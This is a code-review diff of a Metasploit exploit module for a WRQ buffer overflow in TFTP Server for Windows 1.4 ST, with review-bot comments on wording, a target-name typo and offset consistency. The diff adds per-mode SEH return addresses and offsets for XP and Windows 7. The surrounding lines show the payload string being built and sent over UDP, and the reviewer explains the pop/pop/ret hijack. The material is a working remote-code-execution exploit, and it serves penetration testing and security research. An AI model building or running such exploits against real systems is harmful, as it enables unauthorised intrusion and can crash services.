diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb b/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb
index 2f27976bbe..6b75797544 100644
--- a/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb
+++ b/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb
@@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
 'Description' => %q{
 TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
- muts..at..offensive-security.com SEH Exploit
+ muts..at..offensive-security.com
+ The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request.
+ The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
+ and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
+ which allows the corrupted data to be used in a strcmp() function, causing an access violation.
+
+ Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
+ launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
+ A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
 ported to metasploit by Datacut},
 'Author' =>
@@ -40,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'OSVDB', '43785' ],
-['BID', '18345' ],
+[ 'BID', '18345' ],
 [ 'URL', 'http://www.exploit-db.com/exploits/5314/' ],
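Review bot: The new description removes the old 'SEH Exploit' wording, so the added text now explains the crash (the NULL from fopen() feeding strcmp()) but no longer says how execution is hijacked, even though the exploit body still builds `nseh` followed by `[target.ret].pack('V')` and every target is commented `pop pop ret tftpserversp.exe`. Keep one line on the mechanism, e.g. `The overflow overwrites the SEH chain; each target's Ret is a pop/pop/ret inside tftpserversp.exe.` The added paragraph tells the operator to choose between a 'Service' and a 'Standalone' launch, but the targets this module exposes are labelled 'Server Mode' and 'Standalone Mode' — use one term in both places, since the description itself warns that picking the wrong one may crash the target. Two wording fixes in the new lines: `may result a denial-of-service` should be `may result in a denial of service`, and `to TFTP server binary's path` should be `to the TFTP server binary's path`. The %q{} literal is complete within the hunk, but the info hash it belongs to opens and closes outside it.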
@@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
 # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista
- [ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
- [ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
- [ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
+ [ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
+ [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
+ [ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
+ [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
+ [ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
+ [ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
 ],
 'Privileged' => false,
 'DisclosureDate'=> 'Mar 26 2008',
- 'DefaultTarget' => 2))
+ 'DefaultTarget' => 5))
 register_options(
@@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
 mode = "netascii"
- sploit = "\x00\x02" + evil + "\0" + mode +"\0"
+ sploit = "\x00\x02" + evil + "\0" + mode +"\0"
 #Send the WRQ packet (header "\x00\x02")
 udp_sock.put(sploit)
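Review bot: The sixth target is spelled `'Windows 7 SP0/SP1 EN x86 Standalone Mose'`, and because `'DefaultTarget' => 5` now points at it, the typo is what every operator who leaves TARGET unset will see; it should read `'Windows 7 SP0/SP1 EN x86 Standalone Mode'`. Moving the default from a Server Mode offset to a Standalone one is a behaviour change the hunk does not explain, and since the module's own description says a wrong mode guess may crash the service rather than fail cleanly, a comment beside the default stating why Standalone is assumed — presumably the more common install — would help, e.g. `# Standalone launch assumed; set TARGET to a Server Mode entry when TFTP runs as a service`. Each Standalone offset is exactly 284 bytes above its Server Mode counterpart (1487/1203, 1501/1217, 1507/1223); recording that delta in the `# pop pop ret` comments makes it obvious when one half of a pair has been re-measured and the other not. The `'Targets' =>` line opening this array lies above the hunk, so the array is only partially visible here.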